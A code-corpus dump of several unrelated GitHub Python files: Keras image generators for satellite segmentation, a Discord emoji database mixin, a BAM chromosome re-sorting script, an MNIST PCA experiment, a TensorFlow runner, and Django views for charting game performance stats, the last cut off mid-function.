featurewise_center=norm_gen,\n featurewise_std_normalization=norm_gen,\n featurewise_standardize_axis=(0, 1, 2),\n rotation_range=90,\n horizontal_flip=True,\n vertical_flip=True,\n fill_mode='reflect',\n seed=seed,\n verbose=verbose)\n else:\n datagen = ImageDataGenerator(\n featurewise_center=norm_gen,\n featurewise_std_normalization=norm_gen,\n featurewise_standardize_axis=(0, 1, 2),\n fill_mode='reflect',\n seed=seed,\n verbose=verbose)\n\n datagen.config['random_crop_size'] = shape_gen\n datagen.config['sync_seed'] = seed\n datagen.config['seed'] = seed\n if shape_gen_out:\n datagen.config['center_crop_size'] = shape_gen_out\n else:\n datagen.config['center_crop_size'] = shape_gen \n\n # sets which channels to use for fitting\n # note that is -1 is included, a 'no pixel' channel is appended\n datagen.config['channel_idxs'] = mask_channels\n\n if augment and norm_gen:\n datagen.set_pipeline([random_crop, random_transform, standardize, center_crop, pick_channels])\n elif augment and not norm_gen:\n datagen.set_pipeline([random_crop, random_transform, center_crop, pick_channels])\n elif not augment and norm_gen:\n datagen.set_pipeline([random_crop, standardize, center_crop, pick_channels])\n else:\n datagen.set_pipeline([random_crop, center_crop, pick_channels])\n\n if classify == 'hard':\n datagen.set_pipeline([get_max_class])\n elif classify == 'soft':\n datagen.set_pipeline([get_soft_class])\n \n # define how the data is flowing from the directory\n # If we are preloading, we load up the data and then\n # use flow to iterate the numpy array\n if preload:\n # load up X data, assuming in tbl format\n X = _preload_data(data_dir, read_format)\n # flow does not need y (the labeled data) to be \n # passed, we can zip it up later\n datagen_flow = datagen.flow(X,\n batch_size=batch_size,\n seed=seed)\n else:\n datagen_flow = datagen.flow_from_directory(data_dir,\n class_mode=None,\n read_formats={read_format},\n image_reader=read_format,\n batch_size=batch_size,\n seed=seed)\n X = None\n\n return (datagen, datagen_flow, X)\n\n\ndef get_classifier_generators(batch_size=4,\n augment=False,\n nb_iter=200,\n shape_in=(572, 572),\n seed=0,\n verbose=1,\n norm_path='gen_norm.p',\n preload=False,\n read_format='tbl'):\n \"\"\" Creates starting classifier net to pre-train\n auto-encoder \"\"\"\n (datagen_X, dgdx, X) = setup_generator(data_dir = 'images/train/',\n shape_gen = shape_in,\n augment = augment,\n batch_size = batch_size,\n preload=preload,\n read_format=read_format)\n (datagen_Y, dgdy, y) = setup_generator(data_dir = 'masks/',\n shape_gen = shape_in,\n shape_gen_out = shape_out,\n augment = augment,\n classify = 'soft',\n batch_size=batch_size,\n preload=preload,\n read_format=read_format)\n\n datagen_X.fit_generator(dgdx, nb_iter=nb_iter)\n\n dg_mean = datagen_X.config['mean']\n dg_std = datagen_X.config['std']\n print('Generator fitted, mean: {mean}, std: {std}'.format(mean=dg_mean, \n std=dg_std))\n\n _pickle_fit_vars(norm_path, (dg_mean, dg_std))\n\n classify_generator = dgdx + dgdy\n return classify_generator\n\n\ndef get_ae_generators(batch_size=4,\n augment=False,\n nb_iter=200,\n shape_in=(572,572),\n shape_out=(388,388),\n seed=0,\n verbose=1,\n norm_path='gen_norm.p',\n read_format='tbl',\n preload=False):\n \"\"\" Creates generators for autoencoder net\n \"\"\"\n\n # The autoencoder pulls images from both test and train\n # sets, avoiding over-fitting and giving better results\n (datagen_X, dgdx, X) = setup_generator(data_dir = 'images/train',\n shape_gen = shape_in,\n augment = augment,\n batch_size=batch_size,\n read_format=read_format,\n preload=preload)\n (datagen_Y, dgdy, y) = setup_generator(data_dir = 'images/train',\n shape_gen = shape_out,\n augment = augment,\n mask_channels = (0, 1, 2),\n batch_size=batch_size,\n read_format=read_format,\n preload=preload)\n\n # fit generator for normalization\n datagen_X.fit_generator(dgdx, nb_iter=nb_iter)\n\n # transfer over learned norm parameters\n x_mean = datagen_X.config['mean']\n x_std = datagen_X.config['std']\n datagen_Y.config['mean'] = x_mean \n datagen_Y.config['std'] = x_std\n\n # Save variables\n _pickle_fit_vars(norm_path, (x_mean, x_std))\n\n # pack up and return generator\n autoencode_generator = dgdx + dgdy\n\n return autoencode_generator\n\n\ndef get_generators(batch_size=8,\n augment=False,\n nb_iter=200,\n shape_in=(572,572, 20),\n shape_out=(388,388, 11),\n seed=0,\n verbose=1,\n channel_idxs=None,\n norm_path=None,\n read_format='tbl',\n preload=False):\n\n assert channel_idxs is None or len(channel_idxs) == shape_out[2]\n shape_in = (shape_in[0], shape_in[1])\n shape_out = (shape_out[0], shape_out[1])\n\n (datagen_X, dgdx, X) = setup_generator(data_dir = 'images/train/',\n shape_gen = shape_in,\n augment = augment,\n batch_size=batch_size,\n read_format=read_format,\n preload=preload)\n (datagen_Y, dgdy, y) = setup_generator(data_dir = 'masks/train/',\n shape_gen = shape_in,\n shape_gen_out = shape_out,\n augment = augment,\n norm_gen = False,\n mask_channels=channel_idxs,\n batch_size=batch_size,\n read_format=read_format,\n preload=preload)\n (datagen_validX, dvdx, vX) = setup_generator(data_dir = 'images/valid/',\n shape_gen = shape_in,\n augment = False,\n batch_size=batch_size,\n read_format=read_format,\n preload=preload)\n (datagen_validY, dvdy, vy) = setup_generator(data_dir = 'masks/valid/',\n shape_gen = shape_in,\n shape_gen_out = shape_out,\n augment = False,\n norm_gen = False,\n mask_channels=channel_idxs,\n batch_size=batch_size,\n read_format=read_format,\n preload=preload)\n\n\n # enforce syncing\n datagen_X.config['sync_seed'] = seed\n datagen_Y.config['sync_seed'] = seed\n\n datagen_validX.config['sync_seed'] = seed\n datagen_validY.config['sync_seed'] = seed\n # use previously fitted values from autoencoder run, otherwise\n # refit generator\n if norm_path in os.listdir():\n data_file = open(norm_path, 'rb')\n (x_mean, x_std) = pickle.load(data_file)\n data_file.close()\n\n datagen_X.config['mean'] = x_mean\n datagen_X.config['std'] = x_std\n else:\n datagen_X.fit_generator(dgdx, nb_iter=nb_iter)\n\n\n # make sure the validation data is using the same mean/std\n datagen_validX.config['mean'] = datagen_X.config['mean']\n datagen_validX.config['std'] = datagen_X.config['std']\n # synchronize the two generators (+ operation creates tuple)\n train_generator = dgdx + dgdy\n valid_generator = dvdx + dvdy\n\n # return the zipped up generators\n return (train_generator, valid_generator)\n\n","repo_name":"platawiec/sat-segment","sub_path":"generator_utils.py","file_name":"generator_utils.py","file_ext":"py","file_size_in_byte":11572,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"2002108982","text":"from datetime import datetime\nfrom typing import List, Tuple, Optional\nfrom discord import PartialEmoji\nfrom .._connection import _PostgresConnection\n\n\nclass EmojisUsedMixin(_PostgresConnection):\n async def add_used_emotes(self, to_cache: List[Tuple[int, PartialEmoji, datetime]]):\n params = {\n \"times\": [],\n \"guild_ids\": [],\n \"names\": [],\n \"ids\": [],\n \"animateds\": [],\n }\n\n for guild_id, emote, time in to_cache:\n params[\"guild_ids\"].append(guild_id)\n params[\"times\"].append(time)\n params[\"names\"].append(emote.name)\n params[\"ids\"].append(emote.id)\n params[\"animateds\"].append(emote.animated)\n\n await self.cur.execute(\n f\"INSERT INTO emotes_used (time, guild_id, name, emote_id, animated) VALUES (unnest(%(times)s), unnest(%(guild_ids)s), unnest(%(names)s), unnest(%(ids)s), unnest(%(animateds)s))\",\n parameters=params\n )\n\n async def get_recently_used_emote(self, guild_id: int, name: str) -> Optional[PartialEmoji]:\n await self.cur.execute(\n \"SELECT first(animated, time), first(name, time), emote_id FROM emotes_used WHERE guild_id=%(guild_id)s and lower(\\\"name\\\")=%(name)s group by emote_id\",\n parameters={\"guild_id\": guild_id, \"name\": name.lower()}\n )\n emotes = await _get_emotes(self.cur)\n if emotes:\n return next((emote for emote in emotes if emote.name == name), emotes[0])\n\n async def get_recently_used_emotes(self, guild_id: int, prefix: str, limit: int = 25) -> List[PartialEmoji]:\n if not prefix:\n await self.cur.execute(\n \"select first(animated, time), first(name, time), emote_id from emotes_used where guild_id=%(guild_id)s group by emote_id limit %(limit)s\",\n parameters={\"guild_id\": guild_id, \"limit\": limit}\n )\n else:\n # This one doesn't use an index for the whole thing. Should be OK though\n await self.cur.execute(\n \"select first(animated, time), first(name, time), emote_id from emotes_used where guild_id=%(guild_id)s and starts_with(lower(\\\"name\\\"), %(prefix)s) group by emote_id limit %(limit)s\",\n parameters={\"guild_id\": guild_id, \"prefix\": prefix, \"limit\": limit}\n )\n return await _get_emotes(self.cur)\n\n\nasync def _get_emotes(cur) -> List[PartialEmoji]:\n results = await cur.fetchall()\n return [\n PartialEmoji(animated=animated, name=name.rstrip(\" \"), id=id)\n for animated, name, id in results\n ]\n","repo_name":"NQN-Discord/sql_helper","sub_path":"sql_helper/mixins/emojis_used.py","file_name":"emojis_used.py","file_ext":"py","file_size_in_byte":2620,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"73350677906","text":"#!/usr/bin/env python\n\"\"\"Resort a BAM file karyotypically to match GATK's preferred file order.\n\nBroad's GATK and associated resources prefer BAM files sorted as:\n\n chr1, chr2... chr10, chr11... chrX\n\ninstead of the simple alphabetic sort:\n\n chr1, chr10, chr2 ...\n\nThis takes a sorted BAM files with an alternative ordering of chromosomes\nand re-sorts it the karyotypic way.\n\nUsage:\n resort_bam_karyotype.py [ ]\n\n is a *.dict file produced by Picard that identifies the order\nof chromsomes to sort by:\n\njava -jar CreateSequenceDictionary.jar REFERENCE=your.fasta OUTPUT=your.dict\n\nRequires:\n pysam -- http://code.google.com/p/pysam/\n\"\"\"\nimport os\nimport sys\n\nimport pysam\n\ndef main(ref_file, *in_bams):\n ref = pysam.Samfile(ref_file, \"r\")\n sorter = SortByHeader(ref.header)\n for bam in in_bams:\n sort_bam(bam, sorter.header_cmp, sorter.to_include)\n\ndef sort_bam(in_bam, sort_fn, to_include=None):\n out_file = \"%s-ksort%s\" % os.path.splitext(in_bam)\n index_file = \"%s.bai\" % in_bam\n if not os.path.exists(index_file):\n pysam.index(in_bam)\n\n orig = pysam.Samfile(in_bam, \"rb\")\n chroms = [(c[\"SN\"], c) for c in orig.header[\"SQ\"]]\n new_chroms = chroms[:]\n if to_include:\n new_chroms = [(c, x) for (c, x) in new_chroms if c in to_include]\n new_chroms.sort(sort_fn)\n remapper = _id_remapper(chroms, new_chroms)\n new_header = orig.header\n new_header[\"SQ\"] = [h for (_, h) in new_chroms]\n\n new = pysam.Samfile(out_file, \"wb\", header=new_header)\n for (chrom, _) in new_chroms:\n for read in orig.fetch(chrom):\n write = True\n read.rname = remapper[read.rname]\n try:\n read.mrnm = remapper[read.mrnm]\n # read pair is on a chromosome we are not using\n except KeyError:\n assert to_include is not None\n write = False\n if write:\n new.write(read)\n\ndef _id_remapper(orig, new):\n \"\"\"Provide a dictionary remapping original read indexes to new indexes.\n\n When re-ordering the header, the individual read identifiers need to be\n updated as well.\n \"\"\"\n new_chrom_to_index = {}\n for i_n, (chr_n, _) in enumerate(new):\n new_chrom_to_index[chr_n] = i_n\n remap_indexes = {}\n for i_o, (chr_o, _) in enumerate(orig):\n if chr_o in new_chrom_to_index.keys():\n remap_indexes[i_o] = new_chrom_to_index[chr_o]\n remap_indexes[None] = None\n return remap_indexes\n\nclass SortByHeader:\n \"\"\"Provide chromosome sorting to match an existing header.\n \"\"\"\n def __init__(self, base_header):\n self._chrom_indexes = {}\n self.to_include = []\n for i, item in enumerate(base_header[\"SQ\"]):\n self._chrom_indexes[item[\"SN\"]] = i\n self.to_include.append(item[\"SN\"])\n\n def header_cmp(self, one, two):\n return cmp(self._chrom_indexes[one[0]],\n self._chrom_indexes[two[0]])\n\ndef sort_by_karyotype(one, two):\n \"\"\"Sort function to order reads by karyotype.\n \"\"\"\n return cmp(_split_to_karyotype(one[0]),\n _split_to_karyotype(two[0]))\n\ndef _split_to_karyotype(name):\n parts = name.replace(\"chr\", \"\").split(\"_\")\n try:\n parts[0] = int(parts[0])\n except ValueError:\n pass\n # anything with an extension (_random) goes at the end\n if len(parts) > 1:\n parts.insert(0, \"z\")\n return parts\n\nif __name__ == \"__main__\":\n main(*sys.argv[1:])\n\n","repo_name":"chapmanb/bcbb","sub_path":"nextgen/scripts/utils/resort_bam_karyotype.py","file_name":"resort_bam_karyotype.py","file_ext":"py","file_size_in_byte":3542,"program_lang":"python","lang":"en","doc_type":"code","stars":580,"dataset":"github-code","pt":"48"} +{"seq_id":"31564248730","text":"# -*- coding: utf-8 -*-\nimport numpy as np\nfrom numpy import linalg as la\nimport struct\nfrom array import array\nimport matplotlib.pyplot as plt\nfrom os.path import join\n#from scipy.linalg import eigh\n#from sklearn.metrics import r2_score\nfrom sklearn.metrics import mean_squared_error\n#from sklearn import decomposition\nfrom math import sqrt\nnp.random.seed(2)\n\n#Constants for PCA\nD = 5\nM = 3\nK = 10\ndimRed = [1, 2, 8, 16, 32, 64, 128, 256, 612, 783]\n\ndef runTest():\n #testImageFile = 't10k-images.idx3-ubyte'\n #testLabelFile = 't10k-labels.idx1-ubyte'\n trainImageFile = 'train-images.idx3-ubyte'\n trainLabelFile = 'train-labels.idx1-ubyte'\n trainImages, trainLabels = readImagesAndLabels(trainLabelFile, trainImageFile)\n #testImages, testLabels = readImagesAndLabels(testLabelFile, testImageFile)\n trainImagesSorted = parseImagesIntoArrays(trainImages, trainLabels) \n del trainImageFile, trainLabelFile, trainImages, trainLabels\n #for digit in range(len(trainImagesSorted)):\n # mat = np.array(trainImagesSorted[digit])\n # mat = mat.reshape(len(trainImagesSorted[digit]) ,784)\n # pc, pcmean = pcaViaSVD(mat, K)\n # principal_C.append(pc)\n # pcMeans.append(pcmean)\n #digitNum = 0\n #for digit in pcMeans:\n # #workableArr = np.reshape(digit, (28,28))\n # plt.figure()\n # plt.title(\"Mean of each PC, {}\".format(digitNum))\n # plt.xlabel(\"PC Number\")\n # plt.ylabel(\"Value\")\n # plt.plot(digit)\n # plt.show()\n # digitNum += 1\n nrmsesTotal = []\n for k in range(len(dimRed)):\n #principal_C = []\n #pcMeans = []\n #r2s = []\n nrmses = []\n for digit in range(len(trainImagesSorted)):\n mat = np.array(trainImagesSorted[digit])\n mat = mat.reshape(len(trainImagesSorted[digit]),784)\n pc, pcmean, recon = pcaViaSVD(mat, dimRed[k])\n #principal_C.append(pc)\n #pcMeans.append(pcmean)\n #r2 = 0\n #r2 += r2_score(mat, recon)\n rmse = sqrt(mean_squared_error(mat, recon))\n nrmse = rmse/sqrt(np.mean(mat**2))\n #r2s.append(r2)\n nrmses.append(nrmse)\n nrmsesTotal.append(nrmses)\n for i in range(10):\n nrmseDigit = []\n for n in range(len(nrmsesTotal)):\n nrmseDigit.append(nrmsesTotal[n][i]) \n plt.figure()\n plt.title(\"Normalized Root Mean Square Error for Digit {}\".format(i))\n default_x_ticks = range(len(dimRed))\n plt.xticks(default_x_ticks, dimRed)\n plt.xlabel(\"PC number\")\n plt.ylabel(\"R2\")\n plt.plot(default_x_ticks, nrmseDigit)\n plt.show()\n \n \ndef readImagesAndLabels(labelFile, imageFile):\n path = '..\\\\'\n labelFile = join(path, labelFile)\n imageFile = join(path, imageFile)\n labels = []\n with open(labelFile,'rb') as l:\n magic, size = struct.unpack(\">II\", l.read(8))\n if magic != 2049:\n raise ValueError('Magic number error, expected 2049, got {}'.format(magic))\n labels = array(\"B\", l.read()) \n \n with open(imageFile,'rb') as f:\n magic, size = struct.unpack(\">II\", f.read(8))\n nrows, ncols = struct.unpack(\">II\", f.read(8))\n if magic != 2051:\n raise ValueError('Magic number error, expected 2051, got {}'.format(magic))\n image_data = array(\"B\", f.read())\n images = []\n for i in range(size):\n images.append([0]*nrows*ncols)\n for i in range(size):\n img = np.array(image_data[i*nrows*ncols:(i+1)*nrows*ncols])\n img = img.reshape(1, 784)\n images[i][:] = img\n return images, labels\n \ndef parseImagesIntoArrays(images, labels):\n arrOfImagesSortedByLabel = {}\n for i in range(len(images)):\n if labels[i] in arrOfImagesSortedByLabel:\n arrOfImagesSortedByLabel[labels[i]].append(np.matrix(images[i]))\n else:\n arrOfImagesSortedByLabel[labels[i]] = [np.matrix(images[i])]\n return arrOfImagesSortedByLabel\n \ndef pcaViaSVD(matrix, k):\n #C = np.matmul(matrix.T, matrix)\n #print(\"C = \\n\", C)\n #l, principalA = eigh(C, eigvals=((784-K, 783)))\n #idx = l.argsort()[::-1]\n #l, principalA = l[idx], principalA[:, idx]\n #principalA = principalA.T\n #newCoords = np.matmul(principalA, matrix.T)\n #print(\"l = \\n\", l)\n #print(\"V = \\n\", principalA)\n #principalC = matrix.dot(principalA)\n #print(\"Y = \\n\", principalC)\n U, s, Vt = la.svd(matrix, full_matrices=False)\n #V = Vt.T\n S = np.diag(s)\n #PC_k = principalC[:, 0:K]\n US_k = U[:, 0:k].dot(S[0:k, 0:k])\n recon = U[:, :k] @ np.diag(s[:k]) @ Vt[:k, :]\n means = []\n for pc in US_k.T:\n minVal = np.min(pc)\n for e in range(len(pc)):\n val = pc[e]\n newVal = (val-minVal)\n pc[e] = newVal\n maxVal = np.max(pc)\n for e in range(len(pc)):\n val = pc[e]\n newVal = ((val)/maxVal)\n pc[e] = newVal\n #means.append(np.mean(pc))\n\n return US_k, means, recon\n \nif __name__ == \"__main__\":\n runTest()\n ","repo_name":"WolfWindOW/MLDL","sub_path":"MNIST/MNIST.py","file_name":"MNIST.py","file_ext":"py","file_size_in_byte":5120,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4296649396","text":"#!/usr/bin/env python\n# encoding: utf-8\nimport os\n\nimport argparse\nimport tensorflow as tf\n\n\nclass BaseRun(object):\n def __init__(self):\n self.ARGS = None\n self.parser_init()\n self.tf_init()\n\n def parser_init(self):\n parser = argparse.ArgumentParser(description='Train global model')\n parser.add_argument('train_or_test', nargs='?', help='choose train or test model', choices=['train', 'test'],\n default='train')\n parser.add_argument('--gpu', help=\"gpu device\", default='4')\n parser.add_argument('--model_id', help=\"model id\", default='0')\n parser.add_argument('--model_ids', help=\"model ids\", default='0,1,2,3')\n parser.add_argument('--data_set', help=\"data_set\", default='en_es')\n self.ARGS = parser.parse_args()\n\n def tf_init(self):\n os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = str(self.ARGS.gpu)\n tf.logging.set_verbosity(tf.logging.ERROR)\n config = tf.ConfigProto()\n config.gpu_options.allow_growth = True\n sess = tf.Session(config=config)\n return sess\n\n def trainer_init(self):\n NotImplementedError\n\n def model_init(self):\n NotImplementedError\n\n def run(self):\n sess = self.tf_init()\n trainer = self.trainer_init()\n model = self.model_init()\n if self.ARGS.train_or_test == 'train':\n sess.run(tf.global_variables_initializer())\n trainer.train(model, sess)\n else:\n model_ids = [int(item) for item in self.ARGS.model_ids.split(',')]\n trainer.restore_and_test_model(model, sess, model_ids=model_ids)\n","repo_name":"nghuyong/MTL-SLAM","sub_path":"models/base/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":1694,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"48"} +{"seq_id":"42036682276","text":"import os\nimport statistics\nimport sys\nimport time\nimport random\nfrom datetime import datetime\n\nfrom django import forms\nfrom django.http import HttpResponse, request\nfrom django.shortcuts import render, HttpResponseRedirect\nfrom django.urls import get_resolver, reverse\nfrom django.db.models import Avg\nfrom django.utils.dateparse import parse_datetime\nfrom jinja2 import Environment, FileSystemLoader\nfrom pyecharts import options as opts\nfrom pyecharts.charts import Bar, Line, Page, Tab, HeatMap, Grid\nfrom pyecharts.globals import CurrentConfig\nfrom pyecharts.faker import Faker\n\nfrom .common.util.file import (parse_file_size_int_to_str,\n parse_file_size_str_to_int)\nfrom .models import DataFile, DataFileRecord, StatFileRecord\n\nCurrentConfig.GLOBAL_ENV = Environment(\n loader=FileSystemLoader(\"stats/templates/stats/\"))\nCurrentConfig.ONLINE_HOST = '/static/stats/'\n\n\ndef index(request):\n context = {'url_list': set(v[1].replace(\n 'stats/', '') for k, v in get_resolver(None).reverse_dict.items() if '$' not in v[1])}\n return render(request, 'stats/index.html', context)\n\n\ndef get_changed_data_files(datatime):\n records = DataFileRecord.objects.filter(date_time__date=datatime.date())\n\n ret = []\n for r in records:\n pre_day_rec = DataFileRecord.objects.filter(\n data_file=r.data_file, date_time__lt=r.date_time.date()).order_by('date_time').first()\n if not pre_day_rec:\n ret.append((r.data_file.full_name, r.size))\n else:\n ret.append((r.data_file.full_name, r.size - pre_day_rec.size))\n\n return ret\n\n\ndef data_file_changes(request):\n date = request.GET.get('date', '')\n if date == '':\n date = datetime.today()\n else:\n try:\n date = datetime.strptime(date + ' 23:59:59', \"%Y-%m-%d %H:%M:%S\")\n except ValueError as e:\n pass\n if isinstance(date, datetime):\n datas = get_changed_data_files(date)\n datas = sorted(datas, key=lambda d: d[1], reverse=True)\n datas = [\n {'file_name': k, 'size': parse_file_size_int_to_str(v)} for k, v in datas]\n context = {'d': datas}\n return render(request, 'stats/table.html', context)\n else:\n return HttpResponse('Wrong date parameter')\n\n\ndef data_file_list(request):\n file_name_count = request.GET.get('count', '')\n if file_name_count is not None and file_name_count.isnumeric():\n file_name_count = int(file_name_count)\n else:\n file_name_count = 10\n\n data_files = DataFile.objects.all()\n datas = []\n for obj in data_files:\n datas.append({'file_name': obj.full_name, 'size': obj.current_size()})\n datas = sorted(datas, key=lambda d: d['size'], reverse=True)\n datas = [{'file_name': obj['file_name'], 'size': parse_file_size_int_to_str(\n obj['size'])} for obj in datas][:file_name_count]\n context = {'d': datas}\n return render(request, 'stats/table.html', context)\n\n\ndef data_file_info(request):\n file_names = request.GET.getlist('file_name')\n if not file_names:\n return HttpResponse(\"file_name parameter missing\")\n\n tab = Tab()\n\n for file_name in file_names:\n data_file = DataFile.objects.filter(file_name=file_name).first()\n if not data_file:\n return HttpResponse(f\"Can not find {file_name}\")\n\n data_file_records = DataFileRecord.objects.filter(\n data_file=data_file).order_by('date_time')\n if len(data_file_records) == 0:\n return HttpResponse(f\"No data file record for {file_name}\")\n\n date_list = []\n size_list = []\n for r in data_file_records:\n size_list.append(max(round(r.size / 1024 / 1024, 2), 0.01))\n date_list.append(r.date_time.date())\n\n bar = (\n Bar()\n .add_xaxis(date_list)\n .add_yaxis(file_name, size_list)\n .set_global_opts(title_opts=opts.TitleOpts(title=\"Size(MB)\"))\n )\n tab.add(bar, file_name)\n return HttpResponse(tab.render_embed())\n\n\ndef handle_uploaded_data_file(f):\n lines = []\n for chunk in f.chunks():\n for line in chunk.splitlines():\n if line != '':\n lines.append(line)\n\n version = lines[0].decode('utf-8').split('_')[0]\n date_time_str = lines[1].decode('utf-8').replace('/', '-')\n\n for line in lines[2:]:\n full_name, size_str = line.decode('utf-8').split(',', 2)\n full_name = full_name.replace('\\\\', '/').replace('//', '/')\n full_name = full_name.split('/ns/data/')[1]\n\n data_file_created = False\n new_record_datetime = parse_datetime(date_time_str)\n new_record_size = parse_file_size_str_to_int(size_str)\n data_file = DataFile.objects.filter(full_name=full_name).first()\n if not data_file:\n data_file = DataFile(full_name=full_name,\n file_name=os.path.basename(full_name))\n data_file.save()\n data_file_created = True\n\n create_data_file_record = False\n if data_file_created:\n create_data_file_record = True\n else:\n # check and update same day record\n same_day_data_file_record = DataFileRecord.objects.filter(data_file=data_file,\n date_time__date=new_record_datetime.date()).first()\n if same_day_data_file_record:\n if new_record_size != same_day_data_file_record.size and new_record_datetime > same_day_data_file_record.date_time:\n same_day_data_file_record.size = new_record_size\n same_day_data_file_record.date_time = new_record_datetime\n same_day_data_file_record.save()\n else:\n # check the closet earlier/later day\n pre_day_rec = DataFileRecord.objects.filter(data_file=data_file,\n date_time__lt=new_record_datetime.date()).order_by('-date_time').first()\n next_day_rec = DataFileRecord.objects.filter(data_file=data_file,\n date_time__gt=new_record_datetime.date()).order_by(\n 'date_time').first()\n if not pre_day_rec and not next_day_rec:\n create_data_file_record = True\n elif pre_day_rec and pre_day_rec.size != new_record_size and (not next_day_rec or next_day_rec.size != new_record_size):\n create_data_file_record = True\n elif next_day_rec and next_day_rec.size != new_record_size and (not pre_day_rec or pre_day_rec.size != new_record_size):\n create_data_file_record = True\n # same size record in a row, keep the first one\n if next_day_rec and next_day_rec.size == new_record_size:\n next_day_rec.date_time = new_record_datetime\n next_day_rec.save()\n\n if create_data_file_record:\n data_file_record = DataFileRecord(size=new_record_size,\n date_time=new_record_datetime,\n data_file=data_file)\n data_file_record.save()\n\n\nclass UploadDataFileForm(forms.Form):\n file = forms.FileField()\n\n\ndef add_data_file_record(request):\n if request.method == 'POST':\n form = UploadDataFileForm(request.POST, request.FILES)\n if form.is_valid():\n start = time.time()\n handle_uploaded_data_file(request.FILES['file'])\n return HttpResponse(f'success, time elapsed:{time.time() - start}')\n else:\n form = UploadDataFileForm()\n return render(request, 'stats/upload.html', {'form': form, 'title': 'Add data file record'})\n\n\ndef phase_record(request):\n phase_name = request.GET.get('phase_name', '')\n sub_phase_name = request.GET.get('sub_phase_name', '')\n date_time_str = request.GET.get('date_time_str', '')\n\n if not phase_name or not sub_phase_name:\n return HttpResponse('Invalid paramaters')\n\n statFileRecord = StatFileRecord.objects.filter(\n phase_name=phase_name, sub_phase_name=sub_phase_name, date_time__date=parse_datetime(date_time_str).date()).first()\n if statFileRecord:\n return HttpResponse(\"no recored\")\n\n lines = []\n\n lines = statFileRecord.file.open(mode=\"r\").read().splitlines()\n statFileRecord.file.close()\n\n frames = []\n cpu_times = []\n gpu_times = []\n drawcall_cnts = []\n\n # Frame_Time(ms),CPU_Time(ms),GPU_Time(ms),Draw_Call(100),ESP2D(ms),SORT3D(ms),EVENTS\n for line in lines[2:]:\n attrs = line.split(',')\n frames.append(round(1000 / float(attrs[0]), 2))\n cpu_times.append(round(float(attrs[1]), 2))\n gpu_times.append(round(float(attrs[2]), 2))\n drawcall_cnts.append(round(float(attrs[3]), 2))\n\n page = Page()\n opt_avg = opts.MarkPointOpts(data=[opts.MarkPointItem(type_=\"average\")])\n\n perf_line = (\n Line(init_opts=opts.InitOpts(width=\"1800px\", height=\"900px\"))\n .add_xaxis(list(range(1, len(frames))))\n .add_yaxis(\"frames\", frames, markpoint_opts=opt_avg)\n .add_yaxis(\"cpu_times\", cpu_times, markpoint_opts=opt_avg)\n .add_yaxis(\"gpu_times\", gpu_times, markpoint_opts=opt_avg)\n .add_yaxis(\"drawcall_cnts\", drawcall_cnts, markpoint_opts=opt_avg)\n .set_global_opts(\n title_opts=opts.TitleOpts(title=f'{phase_name}:{sub_phase_name}'),\n yaxis_opts=opts.AxisOpts(max_=100),\n datazoom_opts=[opts.DataZoomOpts(\n range_start=1, range_end=sys.maxsize)]\n )\n )\n page.add(perf_line)\n\n return HttpResponse(page.render_embed())\n\n\ndef phase_stat(request):\n phase_name = request.GET.get('phase_name', '')\n sub_phase_name = request.GET.get('sub_phase_name', '')\n\n if not phase_name or not sub_phase_name:\n return HttpResponse('Invalid paramaters')\n\n dates = []\n frames = []\n cpu_times = []\n gpu_times = []\n drawcall_cnts = []\n\n statFileRecords = StatFileRecord.objects.filter(\n phase_name=phase_name, sub_phase_name=sub_phase_name).order_by('date_time')\n for statFileRecord in statFileRecords:\n dates.append(statFileRecord.date_time.date())\n frames.append(round(statFileRecord.avg_fps, 2))\n cpu_times.append(round(statFileRecord.avg_cpu, 2))\n gpu_times.append(round(statFileRecord.avg_gpu, 2))\n drawcall_cnts.append(round(statFileRecord.avg_drawcall, 2))\n\n if len(dates) > 0:\n page = Page()\n opt_avg = opts.MarkPointOpts(\n data=[opts.MarkPointItem(type_=\"average\")])\n\n perf_line = (\n Line(init_opts=opts.InitOpts(width=\"1800px\", height=\"900px\"))\n .add_xaxis(dates)\n .add_yaxis(\"frames\", frames, markpoint_opts=opt_avg)\n .add_yaxis(\"cpu_times\", cpu_times, markpoint_opts=opt_avg)\n .add_yaxis(\"gpu_times\", gpu_times, markpoint_opts=opt_avg)\n .add_yaxis(\"drawcall_cnts\", drawcall_cnts, markpoint_opts=opt_avg)\n .set_global_opts(\n title_opts=opts.TitleOpts(\n title=f'{phase_name}:{sub_phase_name}'),\n yaxis_opts=opts.AxisOpts(max_=100),\n datazoom_opts=[opts.DataZoomOpts(\n range_start=1, range_end=sys.maxsize)]\n )\n )\n page.add(perf_line)\n\n return HttpResponse(page.render_embed())\n else:\n return HttpResponse(\"no recored\")\n\n\ndef create_uploaded_stats_file(file, version, phase_name, sub_phase_name, date_time_str):\n statFileRecord = StatFileRecord.objects.create(\n phase_name=phase_name, sub_phase_name=sub_phase_name, version=version, file=file, date_time=parse_datetime(date_time_str))\n lines = statFileRecord.file.open(mode=\"r\").read().splitlines()\n statFileRecord.file.close()\n\n frames = []\n cpu_times = []\n gpu_times = []\n drawcall_cnts = []\n\n # Frame_Time(ms),CPU_Time(ms),GPU_Time(ms),Draw_Call(100),ESP2D(ms),SORT3D(ms),EVENTS\n for line in lines[2:]:\n attrs = line.split(',')\n frames.append(float(attrs[0]))\n cpu_times.append(float(attrs[1]))\n gpu_times.append(float(attrs[2]))\n drawcall_cnts.append(float(attrs[3]))\n\n statFileRecord.avg_fps = 1000 / statistics.mean(frames)\n statFileRecord.avg_cpu = statistics.mean(cpu_times)\n statFileRecord.avg_gpu = statistics.mean(gpu_times)\n statFileRecord.avg_drawcall = statistics.mean(drawcall_cnts)\n statFileRecord.save()\n\n print(f'Added stat: P{phase_name} {sub_phase_name} {date_time_str}')\n\n\nclass UploadStatsFileForm(forms.Form):\n files = forms.FileField(\n widget=forms.ClearableFileInput(attrs={'multiple': True}))\n\n\ndef add_stats_file_record(request):\n if request.method == 'POST':\n form = UploadStatsFileForm(request.POST, request.FILES)\n if form.is_valid():\n start = time.time()\n\n files = request.FILES.getlist('files')\n\n for file in files:\n for chunk in file.chunks():\n lines = chunk.splitlines()[:2]\n version = lines[0].decode('utf-8').split('_')[0]\n 